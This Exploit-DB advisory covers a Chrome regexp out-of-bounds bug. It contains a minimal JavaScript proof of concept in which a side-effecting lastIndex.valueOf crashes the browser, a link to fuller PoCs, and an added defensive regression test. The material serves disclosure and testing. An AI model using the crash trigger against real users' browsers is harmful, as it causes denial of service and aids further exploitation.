EDB-ID: 42286 | Author: Google Security Research | Published: 2017-06-30 | CVE: N/A | Type: Dos | Platform: Multiple | Aliases: N/A | Advisory/Source: Link | Tags: Out Of Bounds | Vulnerable App: N/A |
A minimal PoC is as follows, and two full PoCs (one for test and one for exec) are attached.

    var re;
    function f(){
        for(var i = 0; i < 100; i++){
            re["test" + i] = 0x77777777; // make a dict
        }
        return 0;
    }
    re = /-/g;
    var str = '2016-01-02';
    re.lastIndex = {valueOf : f};
    result = re.exec(str);

This PoC crashes on google-chrome-beta on Linux.
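
A regression check for the pattern the PoC exercises, added here as an example and not part of the original report: it runs both `exec` and `test` with a `lastIndex` whose `valueOf` adds properties to the regexp mid-call, and compares the outcome with a plain numeric `lastIndex`. The helper names (`makeSideEffectIndex`, `runCase`, `checkEngine`) are hypothetical, and the expected values assume the ECMAScript rule that `exec`/`test` convert `lastIndex` with ToLength, which calls `valueOf` once.

```javascript
// Added example: a side-effecting lastIndex must not change what
// exec()/test() return compared with a plain numeric lastIndex.
function makeSideEffectIndex(re, start, log) {
  return {
    valueOf() {
      log.calls++;
      // Same shape change as the PoC: many named properties added mid-call.
      for (let i = 0; i < 100; i++) re["test" + i] = 0x77777777;
      return start;
    },
  };
}

// Run one method ("exec" or "test") on the PoC's regexp and input string.
function runCase(method, start, withSideEffect) {
  const re = /-/g;
  const log = { calls: 0 };
  re.lastIndex = withSideEffect ? makeSideEffectIndex(re, start, log) : start;
  const out = re[method]("2016-01-02");
  return {
    result: Array.isArray(out) ? { match: out[0], index: out.index } : out,
    lastIndex: re.lastIndex, // a number again once the call has finished
    calls: log.calls,
  };
}

// Differential check: returns the list of cases where the engine diverges.
function checkEngine() {
  const failures = [];
  for (const method of ["exec", "test"]) {
    for (const start of [0, 5, 8]) { // match at 4, match at 7, no match
      const base = runCase(method, start, false);
      const got = runCase(method, start, true);
      if (JSON.stringify(base.result) !== JSON.stringify(got.result) ||
          base.lastIndex !== got.lastIndex || got.calls !== 1) {
        failures.push({ method, start, base, got });
      }
    }
  }
  return failures;
}

const failures = checkEngine();
console.log(failures.length === 0 ? "ok: results match the baseline" : failures);
```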
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42286.zip